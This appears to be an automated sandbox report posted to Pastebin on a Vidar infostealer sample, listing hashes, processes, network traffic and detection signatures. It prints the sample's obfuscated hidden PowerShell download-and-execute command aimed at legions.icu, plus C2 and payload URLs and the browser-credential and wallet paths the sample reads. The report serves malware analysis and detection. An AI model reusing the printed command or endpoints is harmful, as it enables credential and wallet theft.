paladin316

Exes_7079a8be529538dc1720f849ab5ad7d0_exe_2019-08-16_22_30.txt

Aug 16th, 2019
2,514
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.19 KB | None | 0 0
  1.  
  2. * MalFamily: "Vidar"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_7079a8be529538dc1720f849ab5ad7d0.exe"
  7. * File Size: 282112
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "d3057edb0825b04702ce8fe6f12321adb9a4c6f26148f6889a6c8dd79eec8968"
  10. * MD5: "7079a8be529538dc1720f849ab5ad7d0"
  11. * SHA1: "5deede8970535fcb064b5ea9152f9d238e22b240"
  12. * SHA512: "36250fec2eea17a01cf6eb0e7b00e8ac85108911ee9deee09ea991fe8649c8dbc2279a0ef5522a52e0df0fdaa01a1bbae478e9efbe13fb6007489c025a3477de"
  13. * CRC32: "EC74795B"
  14. * SSDEEP: "3072:vTGmn19+zxIkvP/wI2eUEhQzcjC4i2rZZBfPVcmT48ntyG/TWau6wTVRPObRIvpe:LRn1kzm8wI2enh+m8y9ahfTvMsLqNN"
  15.  
  16. * Process Execution:
  17. "Exes_7079a8be529538dc1720f849ab5ad7d0.exe",
  18. "myile.exe",
  19. "le.exe",
  20. "cmd.exe",
  21. "cmd.exe",
  22. "powershell.exe"
  23.  
  24.  
  25. * Executed Commands:
  26. "cmd.exe /c start /B powershell -windowstyle hidden -command \"&$t='#i##ex#@(n#ew#-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).#Up#loa#d#St#ri#ng(#''h#t#tp#:#//legions.icu/leg##ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t0$t1\"",
  27. "C:\\Windows\\System32\\cmd.exe U >> NUL",
  28. "powershell -windowstyle hidden -command \"&$t='#i##ex#@(n#ew#-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).#Up#loa#d#St#ri#ng(#''h#t#tp#:#//legions.icu/leg##ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t0$t1\""
  29.  
  30.  
  31. * Signatures Detected:
  32.  
  33. "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
  34. "Details":
  35.  
  36. "IP": "8.208.21.189:80"
  37.  
  38.  
  39. "IP": "151.139.128.14:80"
  40.  
  41.  
  42.  
  43.  
  44. "Description": "Possible date expiration check, exits too soon after checking local time",
  45. "Details":
  46.  
  47. "process": "Exes_7079a8be529538dc1720f849ab5ad7d0.exe, PID 2648"
  48.  
  49.  
  50.  
  51.  
  52. "Description": "Creates RWX memory",
  53. "Details":
  54.  
  55.  
  56. "Description": "A process created a hidden window",
  57. "Details":
  58.  
  59. "Process": "Exes_7079a8be529538dc1720f849ab5ad7d0.exe -> cmd.exe /c start /B powershell -windowstyle hidden -command \"&$t='#i##ex#@(n#ew#-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).#Up#loa#d#St#ri#ng(#''h#t#tp#:#//legions.icu/leg##ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t0$t1\""
  60.  
  61.  
  62. "Process": "le.exe -> C:\\Windows\\System32\\cmd.exe"
  63.  
  64.  
  65. "Process": "cmd.exe -> C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "Drops a binary and executes it",
  71. "Details":
  72.  
  73. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\le.exe"
  74.  
  75.  
  76. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\myile.exe"
  77.  
  78.  
  79.  
  80.  
  81. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  82. "Details":
  83.  
  84. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  85.  
  86.  
  87. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  88.  
  89.  
  90. "suspicious_request": "http://legions.icu/legion17/welcome"
  91.  
  92.  
  93.  
  94.  
  95. "Description": "Performs some HTTP requests",
  96. "Details":
  97.  
  98. "url": "http://goodday5.icu/gate1.php?a=bbed3e02-0b41-11e3-8249-8fuckusa06e6f6e69632id=2"
  99.  
  100.  
  101. "url": "http://goodday4.icu/eu/1.exe"
  102.  
  103.  
  104. "url": "http://goodday4.icu/eu/2.exe"
  105.  
  106.  
  107. "url": "http://goodday5.icu/gate1.php?a=true"
  108.  
  109.  
  110. "url": "http://iplogger.org/1tqpu7"
  111.  
  112.  
  113. "url": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
  114.  
  115.  
  116. "url": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D"
  117.  
  118.  
  119. "url": "http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg"
  120.  
  121.  
  122. "url": "http://legions.icu/legion17/welcome"
  123.  
  124.  
  125.  
  126.  
  127. "Description": "Steals private information from local Internet browsers",
  128. "Details":
  129.  
  130. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  131.  
  132.  
  133.  
  134.  
  135. "Description": "File has been identified by 11 Antiviruses on VirusTotal as malicious",
  136. "Details":
  137.  
  138. "FireEye": "Generic.mg.7079a8be529538dc"
  139.  
  140.  
  141. "Cylance": "Unsafe"
  142.  
  143.  
  144. "Cybereason": "malicious.970535"
  145.  
  146.  
  147. "APEX": "Malicious"
  148.  
  149.  
  150. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  151.  
  152.  
  153. "AhnLab-V3": "Malware/Win32.Generic.C3345371"
  154.  
  155.  
  156. "Acronis": "suspicious"
  157.  
  158.  
  159. "VBA32": "suspected of Trojan.Downloader.gen.h"
  160.  
  161.  
  162. "Malwarebytes": "Trojan.Downloader"
  163.  
  164.  
  165. "ESET-NOD32": "a variant of Win32/TrojanDownloader.Agent.ERS"
  166.  
  167.  
  168. "Rising": "Downloader.Agent!1.BB58 (CLASSIC)"
  169.  
  170.  
  171.  
  172.  
  173. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  174. "Details":
  175.  
  176. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\wallets\\wallet.dat"
  177.  
  178.  
  179. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\wallets\\wallet.dat"
  180.  
  181.  
  182. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets"
  183.  
  184.  
  185.  
  186.  
  187. "Description": "Created network traffic indicative of malicious activity",
  188. "Details":
  189.  
  190. "signature": "ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016"
  191.  
  192.  
  193. "signature": "ET TROJAN Single char EXE direct download likely trojan (multiple families)"
  194.  
  195.  
  196.  
  197.  
  198.  
  199. * Started Service:
  200.  
  201. * Mutexes:
  202. "Global\\CLR_CASOFF_MUTEX",
  203. "Global\\.net clr networking"
  204.  
  205.  
  206. * Modified Files:
  207. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PA320MG8\\11.exe",
  208. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Q8H2MS75\\21.exe",
  209. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4",
  210. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4",
  211. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220",
  212. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220",
  213. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_99D41F4D77B8F7BB12F6EE812A503A28",
  214. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_99D41F4D77B8F7BB12F6EE812A503A28",
  215. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  216. "\\??\\PIPE\\srvsvc",
  217. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\GSPMAS5TQLYDLXYANY06.temp",
  218. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms"
  219.  
  220.  
  221. * Deleted Files:
  222. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\GSPMAS5TQLYDLXYANY06.temp",
  223. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1100.22439921",
  224. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1100.22439921",
  225. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1100.22439921"
  226.  
  227.  
  228. * Modified Registry Keys:
  229. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  230. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\powershell_RASAPI32",
  231. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\EnableFileTracing",
  232. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\EnableConsoleTracing",
  233. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\FileTracingMask",
  234. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\ConsoleTracingMask",
  235. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\MaxFileSize",
  236. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\FileDirectory"
  237.  
  238.  
  239. * Deleted Registry Keys:
  240.  
  241. * DNS Communications:
  242.  
  243. "type": "A",
  244. "request": "goodday5.icu",
  245. "answers":
  246.  
  247. "data": "8.208.21.189",
  248. "type": "A"
  249.  
  250.  
  251.  
  252.  
  253. "type": "A",
  254. "request": "goodday4.icu",
  255. "answers":
  256.  
  257. "data": "8.208.21.189",
  258. "type": "A"
  259.  
  260.  
  261.  
  262.  
  263. "type": "A",
  264. "request": "iplogger.org",
  265. "answers":
  266.  
  267. "data": "88.99.66.31",
  268. "type": "A"
  269.  
  270.  
  271.  
  272.  
  273. "type": "A",
  274. "request": "legions.icu",
  275. "answers":
  276.  
  277. "data": "8.208.21.189",
  278. "type": "A"
  279.  
  280.  
  281.  
  282.  
  283.  
  284. * Domains:
  285.  
  286. "ip": "8.208.21.189",
  287. "domain": "goodday5.icu"
  288.  
  289.  
  290. "ip": "8.208.21.189",
  291. "domain": "legions.icu"
  292.  
  293.  
  294. "ip": "8.208.21.189",
  295. "domain": "goodday4.icu"
  296.  
  297.  
  298. "ip": "88.99.66.31",
  299. "domain": "iplogger.org"
  300.  
  301.  
  302.  
  303. * Network Communication - ICMP:
  304.  
  305. * Network Communication - HTTP:
  306.  
  307. "count": 1,
  308. "body": "",
  309. "uri": "http://goodday5.icu/gate1.php?a=bbed3e02-0b41-11e3-8249-8fuckusa06e6f6e69632id=2",
  310. "user-agent": "Mylegion666",
  311. "method": "GET",
  312. "host": "goodday5.icu",
  313. "version": "1.1",
  314. "path": "/gate1.php?a=bbed3e02-0b41-11e3-8249-8fuckusa06e6f6e69632id=2",
  315. "data": "GET /gate1.php?a=bbed3e02-0b41-11e3-8249-8fuckusa06e6f6e69632id=2 HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Mylegion666\r\nHost: goodday5.icu\r\n\r\n",
  316. "port": 80
  317.  
  318.  
  319. "count": 1,
  320. "body": "",
  321. "uri": "http://goodday4.icu/eu/1.exe",
  322. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  323. "method": "GET",
  324. "host": "goodday4.icu",
  325. "version": "1.1",
  326. "path": "/eu/1.exe",
  327. "data": "GET /eu/1.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: goodday4.icu\r\nConnection: Keep-Alive\r\n\r\n",
  328. "port": 80
  329.  
  330.  
  331. "count": 1,
  332. "body": "",
  333. "uri": "http://goodday4.icu/eu/2.exe",
  334. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  335. "method": "GET",
  336. "host": "goodday4.icu",
  337. "version": "1.1",
  338. "path": "/eu/2.exe",
  339. "data": "GET /eu/2.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: goodday4.icu\r\nConnection: Keep-Alive\r\n\r\n",
  340. "port": 80
  341.  
  342.  
  343. "count": 1,
  344. "body": "",
  345. "uri": "http://goodday5.icu/gate1.php?a=true",
  346. "user-agent": "Mylegion666",
  347. "method": "GET",
  348. "host": "goodday5.icu",
  349. "version": "1.1",
  350. "path": "/gate1.php?a=true",
  351. "data": "GET /gate1.php?a=true HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Mylegion666\r\nHost: goodday5.icu\r\n\r\n",
  352. "port": 80
  353.  
  354.  
  355. "count": 1,
  356. "body": "",
  357. "uri": "http://iplogger.org/1tqpu7",
  358. "user-agent": "Mylegion666",
  359. "method": "GET",
  360. "host": "iplogger.org",
  361. "version": "1.1",
  362. "path": "/1tqpu7",
  363. "data": "GET /1tqpu7 HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Mylegion666\r\nHost: iplogger.org\r\n\r\n",
  364. "port": 80
  365.  
  366.  
  367. "count": 1,
  368. "body": "",
  369. "uri": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
  370. "user-agent": "Microsoft-CryptoAPI/6.1",
  371. "method": "GET",
  372. "host": "ocsp.usertrust.com",
  373. "version": "1.1",
  374. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
  375. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D HTTP/1.1\r\nCache-Control: max-age = 94765\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Mon, 11 Mar 2019 04:19:13 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.usertrust.com\r\n\r\n",
  376. "port": 80
  377.  
  378.  
  379. "count": 1,
  380. "body": "",
  381. "uri": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D",
  382. "user-agent": "Microsoft-CryptoAPI/6.1",
  383. "method": "GET",
  384. "host": "ocsp.comodoca.com",
  385. "version": "1.1",
  386. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D",
  387. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.comodoca.com\r\n\r\n",
  388. "port": 80
  389.  
  390.  
  391. "count": 1,
  392. "body": "",
  393. "uri": "http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg",
  394. "user-agent": "Microsoft-CryptoAPI/6.1",
  395. "method": "GET",
  396. "host": "ocsp.comodoca.com",
  397. "version": "1.1",
  398. "path": "/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg",
  399. "data": "GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.comodoca.com\r\n\r\n",
  400. "port": 80
  401.  
  402.  
  403. "count": 1,
  404. "body": "",
  405. "uri": "http://legions.icu/legion17/welcome",
  406. "user-agent": "",
  407. "method": "POST",
  408. "host": "legions.icu",
  409. "version": "1.1",
  410. "path": "/legion17/welcome",
  411. "data": "POST /legion17/welcome HTTP/1.1\r\nHost: legions.icu\r\nContent-Length: 10\r\nExpect: 100-continue\r\nConnection: Keep-Alive\r\n\r\n",
  412. "port": 80
  413.  
  414.  
  415.  
  416. * Network Communication - SMTP:
  417.  
  418. * Network Communication - Hosts:
  419.  
  420. * Network Communication - IRC:
Add Comment
Please, Sign In to add comment